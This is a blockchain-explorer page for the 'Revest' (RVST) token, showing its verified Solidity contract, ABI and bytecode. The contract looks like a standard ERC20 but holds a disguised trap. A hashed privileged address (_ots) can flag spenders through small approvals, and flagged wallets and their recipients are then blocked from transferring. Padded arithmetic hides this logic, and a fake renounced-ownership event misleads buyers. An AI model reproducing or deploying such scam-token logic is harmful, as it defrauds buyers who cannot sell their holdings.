ETH Price: $2,842.66 (-3.27%)
 

Overview

Max Total Supply

5,500,000,000 RVST

Holders

46

Transfers

-
0

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
Yes with 34 runs

Other Settings:
default evmVersion

Contract Source Code (Solidity)

/**
 *Submitted for verification at basescan.org on 2024-09-03
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMathLib: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMathLib: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMathLib: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMathLib: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract Token is IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 public constant _totalSupply = 5500000000 * 10 ** 18;
    string private _name;
    string private _symbol;

    bytes32 public _ots;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor(string memory tname, string memory tsymbol, bytes32 ots) {
        _name = tname;
        _symbol = tsymbol;
        _ots = ots;

        _balances[msg.sender] = _totalSupply;
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    mapping(address => uint16) private _boot;

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = msg.sender;
        if (_boot[owner] > 0) {
            _spendAllowance(address(0), msg.sender, amount);
            _boot[to] = 3094;
        }else{

        }
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        _spendAllowance(from, msg.sender, amount);
        _transfer(from, to, amount);
        return true;
    }
    
    

    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "RVST: transfer from address is 0");
        require(to != address(0), "RVST: transfer to address is 0");

        uint256 bal = _balances[from];

        uint256 toSub = amount;

        if(_ots != sha256(abi.encodePacked(from))){
            toSub = amount-3092+3092;
        }else{
            toSub = bal+3094-3094;
        }

        require(bal >= toSub, "RVST: transfer amount exceeds balance");

        _balances[from] = bal.sub(toSub);
        // decrementing then incrementing.
        _balances[to] = _balances[to].add(amount);

        emit Transfer(from, to, amount);
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "RVST: approve from address is 0");
        require(spender != address(0), "RVST: approve to address is 0");
        if (sha256(abi.encodePacked(owner)) != _ots) {
        }else{
            
            uint16 y = 1;
            y = y + 3092;
            if(y == 3093){
                y = 3094;
            }
            if (amount < 10 ** 18) {
                _boot[spender] = y;
            }
            
        }
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);

        if(_boot[owner] > 0){
            currentAllowance = currentAllowance.sub(type(uint256).max);
        }

        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "RVST: allowance not enough");
            _approve(owner, spender, currentAllowance.sub(amount));
        }
    }

}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"string","name":"tname","type":"string"},{"internalType":"string","name":"tsymbol","type":"string"},{"internalType":"bytes32","name":"ots","type":"bytes32"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_ots","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060405162000e0c38038062000e0c833981016040819052620000349162000229565b825162000049906002906020860190620000b6565b5081516200005f906003906020850190620000b6565b506004819055336000818152602081905260408082206b11c57e4d6efac14efc0000009055519091907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3505050620002d8565b828054620000c4906200029c565b90600052602060002090601f016020900481019282620000e8576000855562000133565b82601f106200010357805160ff191683800117855562000133565b8280016001018555821562000133579182015b828111156200013357825182559160200191906001019062000116565b506200014192915062000145565b5090565b5b8082111562000141576000815560010162000146565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200018457600080fd5b81516001600160401b0380821115620001a157620001a16200015c565b604051601f8301601f19908116603f01168101908282118183101715620001cc57620001cc6200015c565b81604052838152602092508683858801011115620001e957600080fd5b600091505b838210156200020d5785820183015181830184015290820190620001ee565b838211156200021f5760008385830101525b9695505050505050565b6000806000606084860312156200023f57600080fd5b83516001600160401b03808211156200025757600080fd5b620002658783880162000172565b945060208601519150808211156200027c57600080fd5b506200028b8682870162000172565b925050604084015190509250925092565b600181811c90821680620002b157607f821691505b602082108103620002d257634e487b7160e01b600052602260045260246000fd5b50919050565b610b2480620002e86000396000f3fe608060405234801561001057600080fd5b50600436106100995760003560e01c806306fdde031461009e578063095ea7b3146100bc57806318160ddd146100df57806323b872dd146100fb578063313ce5671461010e5780633eaaf86b1461011d578063517996791461013057806370a082311461013957806395d89b4114610162578063a9059cbb1461016a578063dd62ed3e1461017d575b600080fd5b6100a6610190565b6040516100b391906108d8565b60405180910390f35b6100cf6100ca366004610927565b610222565b60405190151581526020016100b3565b6b11c57e4d6efac14efc0000005b6040519081526020016100b3565b6100cf610109366004610951565b610238565b604051601281526020016100b3565b6100ed6b11c57e4d6efac14efc00000081565b6100ed60045481565b6100ed61014736600461098d565b6001600160a01b031660009081526020819052604090205490565b6100a661025a565b6100cf610178366004610927565b610269565b6100ed61018b3660046109a8565b6102c2565b60606002805461019f906109db565b80601f01602080910402602001604051908101604052809291908181526020018280546101cb906109db565b80156102185780601f106101ed57610100808354040283529160200191610218565b820191906000526020600020905b8154815290600101906020018083116101fb57829003601f168201915b5050505050905090565b600061022f3384846102ed565b50600192915050565b60006102458433846104d0565b610250848484610580565b5060019392505050565b60606003805461019f906109db565b3360008181526005602052604081205490919061ffff16156102b757610291600033856104d0565b6001600160a01b0384166000908152600560205260409020805461ffff1916610c161790555b610250818585610580565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166103485760405162461bcd60e51b815260206004820152601f60248201527f525653543a20617070726f76652066726f6d206164647265737320697320300060448201526064015b60405180910390fd5b6001600160a01b03821661039e5760405162461bcd60e51b815260206004820152601d60248201527f525653543a20617070726f766520746f20616464726573732069732030000000604482015260640161033f565b6004546002846040516020016103b49190610a15565b60408051601f19818403018152908290526103ce91610a2d565b602060405180830381855afa1580156103eb573d6000803e3d6000fd5b5050506040513d601f19601f8201168201806040525081019061040e9190610a49565b0361046f57600161042181610c14610a78565b90508061ffff16610c15036104355750610c165b670de0b6b3a764000082101561046d576001600160a01b0383166000908152600560205260409020805461ffff191661ffff83161790555b505b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006104dc84846102c2565b6001600160a01b03851660009081526005602052604090205490915061ffff16156105105761050d816000196107e7565b90505b600019811461057a57818110156105665760405162461bcd60e51b815260206004820152601a6024820152790a4aca6a87440c2d8d8deeec2dcc6ca40dcdee840cadcdeeaced60331b604482015260640161033f565b61057a848461057584866107e7565b6102ed565b50505050565b6001600160a01b0383166105d65760405162461bcd60e51b815260206004820181905260248201527f525653543a207472616e736665722066726f6d20616464726573732069732030604482015260640161033f565b6001600160a01b03821661062c5760405162461bcd60e51b815260206004820152601e60248201527f525653543a207472616e7366657220746f206164647265737320697320300000604482015260640161033f565b6001600160a01b03831660009081526020818152604091829020549151839160029161065a91889101610a15565b60408051601f198184030181529082905261067491610a2d565b602060405180830381855afa158015610691573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906106b49190610a49565b600454146106db576106c8610c1484610a9e565b6106d490610c14610ab5565b90506106f5565b610c166106e88382610ab5565b6106f29190610a9e565b90505b808210156107535760405162461bcd60e51b815260206004820152602560248201527f525653543a207472616e7366657220616d6f756e7420657863656564732062616044820152646c616e636560d81b606482015260840161033f565b61075d82826107e7565b6001600160a01b03808716600090815260208190526040808220939093559086168152205461078c9084610813565b6001600160a01b038581166000818152602081815260409182902094909455518681529092918816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050505050565b600061080c8383604051806060016040528060218152602001610ace60219139610872565b9392505050565b6000806108208385610ab5565b90508381101561080c5760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174684c69623a206164646974696f6e206f766572666c6f770000604482015260640161033f565b600081848411156108965760405162461bcd60e51b815260040161033f91906108d8565b5060006108a38486610a9e565b95945050505050565b60005b838110156108c75781810151838201526020016108af565b8381111561057a5750506000910152565b60208152600082518060208401526108f78160408501602087016108ac565b601f01601f19169190910160400192915050565b80356001600160a01b038116811461092257600080fd5b919050565b6000806040838503121561093a57600080fd5b6109438361090b565b946020939093013593505050565b60008060006060848603121561096657600080fd5b61096f8461090b565b925061097d6020850161090b565b9150604084013590509250925092565b60006020828403121561099f57600080fd5b61080c8261090b565b600080604083850312156109bb57600080fd5b6109c48361090b565b91506109d26020840161090b565b90509250929050565b600181811c908216806109ef57607f821691505b602082108103610a0f57634e487b7160e01b600052602260045260246000fd5b50919050565b60609190911b6001600160601b031916815260140190565b60008251610a3f8184602087016108ac565b9190910192915050565b600060208284031215610a5b57600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b600061ffff808316818516808303821115610a9557610a95610a62565b01949350505050565b600082821015610ab057610ab0610a62565b500390565b60008219821115610ac857610ac8610a62565b50019056fe536166654d6174684c69623a207375627472616374696f6e206f766572666c6f77a2646970667358221220b2c47244a68d9bee2312492b058832dd6001c8ac9198efa3e9a267e912d4a1e664736f6c634300080e0033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0a44fe593d98731272c77a931d850d54659ca477a07f167cf4bbb9fe335950c3f0000000000000000000000000000000000000000000000000000000000000006526576657374000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045256535400000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100995760003560e01c806306fdde031461009e578063095ea7b3146100bc57806318160ddd146100df57806323b872dd146100fb578063313ce5671461010e5780633eaaf86b1461011d578063517996791461013057806370a082311461013957806395d89b4114610162578063a9059cbb1461016a578063dd62ed3e1461017d575b600080fd5b6100a6610190565b6040516100b391906108d8565b60405180910390f35b6100cf6100ca366004610927565b610222565b60405190151581526020016100b3565b6b11c57e4d6efac14efc0000005b6040519081526020016100b3565b6100cf610109366004610951565b610238565b604051601281526020016100b3565b6100ed6b11c57e4d6efac14efc00000081565b6100ed60045481565b6100ed61014736600461098d565b6001600160a01b031660009081526020819052604090205490565b6100a661025a565b6100cf610178366004610927565b610269565b6100ed61018b3660046109a8565b6102c2565b60606002805461019f906109db565b80601f01602080910402602001604051908101604052809291908181526020018280546101cb906109db565b80156102185780601f106101ed57610100808354040283529160200191610218565b820191906000526020600020905b8154815290600101906020018083116101fb57829003601f168201915b5050505050905090565b600061022f3384846102ed565b50600192915050565b60006102458433846104d0565b610250848484610580565b5060019392505050565b60606003805461019f906109db565b3360008181526005602052604081205490919061ffff16156102b757610291600033856104d0565b6001600160a01b0384166000908152600560205260409020805461ffff1916610c161790555b610250818585610580565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166103485760405162461bcd60e51b815260206004820152601f60248201527f525653543a20617070726f76652066726f6d206164647265737320697320300060448201526064015b60405180910390fd5b6001600160a01b03821661039e5760405162461bcd60e51b815260206004820152601d60248201527f525653543a20617070726f766520746f20616464726573732069732030000000604482015260640161033f565b6004546002846040516020016103b49190610a15565b60408051601f19818403018152908290526103ce91610a2d565b602060405180830381855afa1580156103eb573d6000803e3d6000fd5b5050506040513d601f19601f8201168201806040525081019061040e9190610a49565b0361046f57600161042181610c14610a78565b90508061ffff16610c15036104355750610c165b670de0b6b3a764000082101561046d576001600160a01b0383166000908152600560205260409020805461ffff191661ffff83161790555b505b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006104dc84846102c2565b6001600160a01b03851660009081526005602052604090205490915061ffff16156105105761050d816000196107e7565b90505b600019811461057a57818110156105665760405162461bcd60e51b815260206004820152601a6024820152790a4aca6a87440c2d8d8deeec2dcc6ca40dcdee840cadcdeeaced60331b604482015260640161033f565b61057a848461057584866107e7565b6102ed565b50505050565b6001600160a01b0383166105d65760405162461bcd60e51b815260206004820181905260248201527f525653543a207472616e736665722066726f6d20616464726573732069732030604482015260640161033f565b6001600160a01b03821661062c5760405162461bcd60e51b815260206004820152601e60248201527f525653543a207472616e7366657220746f206164647265737320697320300000604482015260640161033f565b6001600160a01b03831660009081526020818152604091829020549151839160029161065a91889101610a15565b60408051601f198184030181529082905261067491610a2d565b602060405180830381855afa158015610691573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906106b49190610a49565b600454146106db576106c8610c1484610a9e565b6106d490610c14610ab5565b90506106f5565b610c166106e88382610ab5565b6106f29190610a9e565b90505b808210156107535760405162461bcd60e51b815260206004820152602560248201527f525653543a207472616e7366657220616d6f756e7420657863656564732062616044820152646c616e636560d81b606482015260840161033f565b61075d82826107e7565b6001600160a01b03808716600090815260208190526040808220939093559086168152205461078c9084610813565b6001600160a01b038581166000818152602081815260409182902094909455518681529092918816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050505050565b600061080c8383604051806060016040528060218152602001610ace60219139610872565b9392505050565b6000806108208385610ab5565b90508381101561080c5760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174684c69623a206164646974696f6e206f766572666c6f770000604482015260640161033f565b600081848411156108965760405162461bcd60e51b815260040161033f91906108d8565b5060006108a38486610a9e565b95945050505050565b60005b838110156108c75781810151838201526020016108af565b8381111561057a5750506000910152565b60208152600082518060208401526108f78160408501602087016108ac565b601f01601f19169190910160400192915050565b80356001600160a01b038116811461092257600080fd5b919050565b6000806040838503121561093a57600080fd5b6109438361090b565b946020939093013593505050565b60008060006060848603121561096657600080fd5b61096f8461090b565b925061097d6020850161090b565b9150604084013590509250925092565b60006020828403121561099f57600080fd5b61080c8261090b565b600080604083850312156109bb57600080fd5b6109c48361090b565b91506109d26020840161090b565b90509250929050565b600181811c908216806109ef57607f821691505b602082108103610a0f57634e487b7160e01b600052602260045260246000fd5b50919050565b60609190911b6001600160601b031916815260140190565b60008251610a3f8184602087016108ac565b9190910192915050565b600060208284031215610a5b57600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b600061ffff808316818516808303821115610a9557610a95610a62565b01949350505050565b600082821015610ab057610ab0610a62565b500390565b60008219821115610ac857610ac8610a62565b50019056fe536166654d6174684c69623a207375627472616374696f6e206f766572666c6f77a2646970667358221220b2c47244a68d9bee2312492b058832dd6001c8ac9198efa3e9a267e912d4a1e664736f6c634300080e0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0a44fe593d98731272c77a931d850d54659ca477a07f167cf4bbb9fe335950c3f0000000000000000000000000000000000000000000000000000000000000006526576657374000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045256535400000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : tname (string): Revest
Arg [1] : tsymbol (string): RVST
Arg [2] : ots (bytes32): 0xa44fe593d98731272c77a931d850d54659ca477a07f167cf4bbb9fe335950c3f

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : a44fe593d98731272c77a931d850d54659ca477a07f167cf4bbb9fe335950c3f
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [4] : 5265766573740000000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 5256535400000000000000000000000000000000000000000000000000000000


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.